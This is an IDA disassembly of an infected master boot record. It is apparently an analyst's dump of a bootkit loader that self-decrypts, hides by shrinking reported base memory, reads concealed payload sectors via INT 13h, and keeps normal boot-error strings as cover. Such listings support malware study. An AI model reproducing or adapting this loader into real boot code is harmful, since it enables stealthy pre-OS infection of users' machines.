seg000:7C00 ;
seg000:7C00 ; +-------------------------------------------------------------------------+
seg000:7C00 ; |   This file has been generated by The Interactive Disassembler (IDA)    |
seg000:7C00 ; |           Copyright (c) 2014 Hex-Rays, <support@hex-rays.com>           |
seg000:7C00 ; +-------------------------------------------------------------------------+
seg000:7C00 ;
seg000:7C00 ; Input MD5   : 5E171882A6C36AFF4F9B677AA652B5BD
seg000:7C00 ; Input CRC32 : 499C8B94
seg000:7C00
seg000:7C00 ; ---------------------------------------------------------------------------
seg000:7C00 ; File Name   : C:\Users\Fabricio\Downloads\infected_mbr_6.bin
seg000:7C00 ; Format      : Binary file
seg000:7C00 ; Base Address: 0000h Range: 7C00h - 7E00h Loaded length: 0200h
seg000:7C00
seg000:7C00                 .686p
seg000:7C00                 .mmx
seg000:7C00                 .model flat
seg000:7C00
seg000:7C00 ; ===========================================================================
seg000:7C00
seg000:7C00 ; Segment type: Pure code
seg000:7C00 seg000          segment byte public 'CODE' use16
seg000:7C00                 assume cs:seg000
seg000:7C00                 ;org 7C00h
seg000:7C00                 assume es:nothing, ss:nothing, ds:nothing, fs:nothing, gs:nothing
seg000:7C00                 xor     ax, ax
seg000:7C02                 mov     ss, ax
seg000:7C04                 mov     sp, 7C00h
seg000:7C07                 mov     es, ax
seg000:7C09                 mov     ds, ax
seg000:7C0B                 sti
seg000:7C0C                 pusha
seg000:7C0D                 mov     cx, 0CFh
seg000:7C10                 mov     bp, 7C19h
seg000:7C13
seg000:7C13 loc_7C13:                               ; CODE XREF: seg000:7C17j
seg000:7C13                 ror     byte ptr [bp+0], cl
seg000:7C16                 inc     bp
seg000:7C17                 loop    loc_7C13
seg000:7C19                 mov     ds:byte_7CE8, dl
seg000:7C1D                 sub     word ptr ds:413h, 10h
seg000:7C22                 mov     ax, ds:413h
seg000:7C25                 shl     ax, 6
seg000:7C28                 mov     ds:word_7C63, ax
seg000:7C2B                 mov     ah, 48h
seg000:7C2D                 mov     si, 7CF9h
seg000:7C30                 mov     ds:word_7CF9, 1Eh
seg000:7C36                 int     13h             ; DISK - IBM/MS Extension - GET DRIVE PARAMETERS (DL - drive, DS:SI - buffer)
seg000:7C38                 mov     di, 7CE3h
seg000:7C3B                 mov     cx, 5
seg000:7C3E                 call    sub_7CA9
seg000:7C41                 mov     eax, [si+10h]
seg000:7C45                 push    ds:word_7C63
seg000:7C49                 pop     es
seg000:7C4A                 xor     di, di
seg000:7C4C
seg000:7C4C loc_7C4C:                               ; CODE XREF: seg000:7C5Dj
seg000:7C4C                 call    sub_7C65
seg000:7C4F                 mov     si, 7D1Dh
seg000:7C52                 mov     cx, ds:word_7D1B
seg000:7C56                 rep movsb
seg000:7C58                 mov     ax, ds:word_7D19
seg000:7C5B                 test    ax, ax
seg000:7C5D                 jnz     short loc_7C4C
seg000:7C5F                 popa
seg000:7C5F ; ---------------------------------------------------------------------------
seg000:7C60                 db 0EAh ; Û
seg000:7C61                 db    0
seg000:7C62                 db    0
seg000:7C63 word_7C63       dw 0                    ; DATA XREF: seg000:7C28w
seg000:7C63                                         ; seg000:7C45r
seg000:7C65
seg000:7C65 ; =============== S U B R O U T I N E =======================================
seg000:7C65
seg000:7C65
seg000:7C65 sub_7C65        proc near               ; CODE XREF: seg000:loc_7C4Cp
seg000:7C65                                         ; sub_7CA9+3p
seg000:7C65                 pusha
seg000:7C66                 mov     ds:byte_7CE9, 10h
seg000:7C6B                 mov     ds:byte_7CEB, 1
seg000:7C70                 push    cs
seg000:7C71                 pop     ds:word_7CEF
seg000:7C75                 mov     ds:word_7CED, 7D17h
seg000:7C7B                 push    large [ds:dword_7D09]
seg000:7C80                 pop     large [ds:dword_7CF1]
seg000:7C85                 push    large [ds:dword_7D0D]
seg000:7C8A                 pop     large [ds:dword_7CF5]
seg000:7C8F                 inc     eax
seg000:7C91                 sub     ds:dword_7CF1, eax
seg000:7C96                 sbb     ds:dword_7CF5, 0
seg000:7C9C                 mov     ah, 42h
seg000:7C9E                 mov     si, 7CE9h
seg000:7CA1                 mov     dl, ds:byte_7CE8
seg000:7CA5                 int     13h             ; DISK - IBM/MS Extension - EXTENDED READ (DL - drive, DS:SI - disk address packet)
seg000:7CA7                 popa
seg000:7CA8                 retn
seg000:7CA8 sub_7C65        endp
seg000:7CA8
seg000:7CA9
seg000:7CA9 ; =============== S U B R O U T I N E =======================================
seg000:7CA9
seg000:7CA9
seg000:7CA9 sub_7CA9        proc near               ; CODE XREF: seg000:7C3Ep
seg000:7CA9                                         ; sub_7CA9+19j
seg000:7CA9                 xor     eax, eax
seg000:7CAC                 call    sub_7C65
seg000:7CAF                 cmp     ds:word_7D17, 4453h
seg000:7CB5                 jz      short loc_7CC4
seg000:7CB7                 dec     ds:dword_7D09
seg000:7CBC                 sbb     ds:dword_7D0D, 0
seg000:7CC2                 jmp     short sub_7CA9
seg000:7CC4 ; ---------------------------------------------------------------------------
seg000:7CC4
seg000:7CC4 loc_7CC4:                               ; CODE XREF: sub_7CA9+Cj
seg000:7CC4                 mov     bp, cx
seg000:7CC6                 mov     bx, 10h
seg000:7CC9                 mov     si, 7D1Dh
seg000:7CCC
seg000:7CCC loc_7CCC:                               ; CODE XREF: sub_7CA9+37j
seg000:7CCC                 repe cmpsb
seg000:7CCE                 sub     si, bp
seg000:7CD0                 test    cx, cx
seg000:7CD2                 jz      short locret_7CE2
seg000:7CD4                 add     si, cx
seg000:7CD6                 add     si, 10h
seg000:7CD9                 sub     cx, bp
seg000:7CDB                 add     di, cx
seg000:7CDD                 mov     cx, bp
seg000:7CDF                 dec     bx
seg000:7CE0                 jnz     short loc_7CCC
seg000:7CE2
seg000:7CE2 locret_7CE2:                            ; CODE XREF: sub_7CA9+29j
seg000:7CE2                 retn
seg000:7CE2 sub_7CA9        endp
seg000:7CE2
seg000:7CE2 ; ---------------------------------------------------------------------------
seg000:7CE3                 db  70h ; p
seg000:7CE4                 db  68h ; h
seg000:7CE5                 db  6Ch ; l
seg000:7CE6                 db  64h ; d
seg000:7CE7                 db    0
seg000:7CE8 byte_7CE8       db 0                    ; DATA XREF: seg000:7C19w
seg000:7CE8                                         ; sub_7C65+3Cr
seg000:7CE9 byte_7CE9       db 60h                  ; DATA XREF: sub_7C65+1w
seg000:7CEA                 db 0BBh ; +
seg000:7CEB byte_7CEB       db 0AAh                 ; DATA XREF: sub_7C65+6w
seg000:7CEC                 db  55h ; U
seg000:7CED word_7CED       dw 41B4h                ; DATA XREF: sub_7C65+10w
seg000:7CEF word_7CEF       dw 13CDh                ; DATA XREF: sub_7C65+Cw
seg000:7CF1 dword_7CF1      dd 0FB813672h           ; DATA XREF: sub_7C65+1Bw
seg000:7CF1                                         ; sub_7C65+2Cw
seg000:7CF5 dword_7CF5      dd 3075AA55h            ; DATA XREF: sub_7C65+25w
seg000:7CF5                                         ; sub_7C65+31w
seg000:7CF9 word_7CF9       dw 0C1F6h               ; DATA XREF: seg000:7C30w
seg000:7CFB                 db    1
seg000:7CFC                 db  74h ; t
seg000:7CFD                 db  2Bh ; +
seg000:7CFE                 db  61h ; a
seg000:7CFF                 db  60h ; `
seg000:7D00                 db  6Ah ; j
seg000:7D01                 db    0
seg000:7D02                 db  6Ah ; j
seg000:7D03                 db    0
seg000:7D04                 db 0FFh
seg000:7D05                 db  76h ; v
seg000:7D06                 db  0Ah
seg000:7D07                 db 0FFh
seg000:7D08                 db  76h ; v
seg000:7D09 dword_7D09      dd 68006A08h            ; DATA XREF: sub_7C65+16r
seg000:7D09                                         ; sub_7CA9+Ew
seg000:7D0D dword_7D0D      dd 16A7C00h             ; DATA XREF: sub_7C65+20r
seg000:7D0D                                         ; sub_7CA9+13w
seg000:7D11                 db  6Ah ; j
seg000:7D12                 db  10h
seg000:7D13                 db 0B4h ; ¦
seg000:7D14                 db  42h ; B
seg000:7D15                 db  8Bh ; ï
seg000:7D16                 db 0F4h ; ¶
seg000:7D17 word_7D17       dw 13CDh                ; DATA XREF: sub_7CA9+6r
seg000:7D19 word_7D19       dw 6161h                ; DATA XREF: seg000:7C58r
seg000:7D1B word_7D1B       dw 0E73h                ; DATA XREF: seg000:7C52r
seg000:7D1D                 db  4Fh ; O
seg000:7D1E                 db  74h ; t
seg000:7D1F                 db  0Bh
seg000:7D20                 db  32h ; 2
seg000:7D21                 db 0E4h ; õ
seg000:7D22                 db  8Ah ; è
seg000:7D23                 db  56h ; V
seg000:7D24                 db    0
seg000:7D25                 db 0CDh ; -
seg000:7D26                 db  13h
seg000:7D27                 db 0EBh ; Ù
seg000:7D28                 db 0D6h ; Í
seg000:7D29                 db  61h ; a
seg000:7D2A                 db 0F9h ; ¨
seg000:7D2B                 db 0C3h ; +
seg000:7D2C                 db  49h ; I
seg000:7D2D aNvalidPartitio db 'nvalid partition table',0
seg000:7D44                 db  45h ; E
seg000:7D45 aRrorLoadingOpe db 'rror loading operating system',0
seg000:7D63                 db  4Dh ; M
seg000:7D64 aIssingOperatin db 'issing operating system',0
seg000:7D7C                 db 39h dup(0), 2Ch, 44h, 63h, 7Dh, 0BAh, 7Dh, 0BAh, 2 dup(0)
seg000:7D7C                 db 80h, 2 dup(1), 0, 7, 0FEh, 0F8h, 0FFh, 38h, 3 dup(0)
seg000:7D7C                 db 88h, 0BDh, 7Fh, 2, 30h dup(0), 55h, 0AAh
seg000:7D7C seg000          ends
seg000:7D7C
seg000:7D7C
seg000:7D7C                 end